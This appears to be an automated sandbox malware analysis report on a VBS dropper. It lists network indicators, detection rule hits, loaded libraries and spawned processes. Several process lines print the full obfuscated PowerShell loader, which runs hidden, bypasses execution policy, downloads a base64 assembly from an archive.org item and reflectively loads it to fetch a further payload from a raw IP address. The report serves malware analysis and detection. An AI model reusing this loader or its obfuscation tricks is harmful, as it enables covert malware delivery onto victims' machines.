Source: global traffic; HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 Host: ia600100.us.archive.org Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /130/RMOTH.txt HTTP/1.1 Host: 107.172.148.248 Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 207.241.227.240 207.241.227.240
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; TCP traffic detected without corresponding DNS query: 107.172.148.248
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: ia600100.us.archive.org
Source: global traffic; DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
              Source: powershell.exe, 00000004.00000002.1819764477.000001C455A12000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://107.172.148.248
              Source: powershell.exe, 00000004.00000002.1819764477.000001C455BCB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://107.172.148.248(
              Source: powershell.exe, 00000004.00000002.1819764477.000001C455A12000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://107.172.148.248/130/RMOTH.txt
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456CAC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ia600100.us.archive.org
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1863528716.000001F48D367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C4555C1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1852407179.000001C46DA61000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.System.resources%20Time-Stamp%20PCA%202010(1).crl0l
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1853033639.000001C46DAEB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.c
              Source: powershell.exe, 00000002.00000002.1863528716.000001F48D33A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1863528716.000001F48D31B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C4555C1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ia600100.us.arXr
              Source: powershell.exe, 00000004.00000002.1819764477.000001C4557E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ia600100.us.archive.org
              Source: powershell.exe, 00000004.00000002.1819764477.000001C4557E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
              Source: powershell.exe, 00000004.00000002.1819764477.000001C4557E2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtKqj;79dbase64Content
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
              Source: unknown; Network traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknown; HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.11:49705 version: TLS 1.2

              System Summary

              Source: Process Memory Space: powershell.exe PID: 7584, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: 0BO4n723Q8.vbs; Initial sample: Strings found which are bigger than 50
              Source: Process Memory Space: powershell.exe PID: 7584, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine; Classification label: mal100.troj.expl.evad.winVBS@6/6@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bldp1xfe.1ea.ps1
              Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs"
              Source: C:\Windows\System32\wscript.exe; File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 0BO4n723Q8.vbs; Virustotal: Detection: 9%
              Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs"
              Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"
              Source: C:\Windows\System32\wscript.exe; Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: mlang.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe; Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: ystem.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb/tL" source: powershell.exe, 00000004.00000002.1851044596.000001C46D76C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb source: powershell.exe, 00000004.00000002.1852407179.000001C46DA40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *e.pdb=p source: powershell.exe, 00000004.00000002.1819295587.000001C45383C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D73B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32% source: powershell.exe, 00000004.00000002.1819295587.000001C45383C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1852407179.000001C46DA40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb( source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1834352585.000001C4665DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.1851044596.000001C46D73B000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe; Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJyc", "0", "false");
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"
              Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFE7DC800BD pushad ; iretd 2_2_00007FFE7DC800C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE7DCA00BD pushad ; iretd 4_2_00007FFE7DCA00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE7DCA5B27 push ebx; iretd 4_2_00007FFE7DCA5B2A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE7DD74570 pushad ; retf 4_2_00007FFE7DD74589
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE7DD75D02 push eax; iretd 4_2_00007FFE7DD75D5E
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1473
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1848
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3165
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6653
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792 Thread sleep count: 3165 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep count: 6653 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep time: -18446744073709540s >= -30000s
              Source: powershell.exe, 00000004.00000002.1851044596.000001C46D730000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
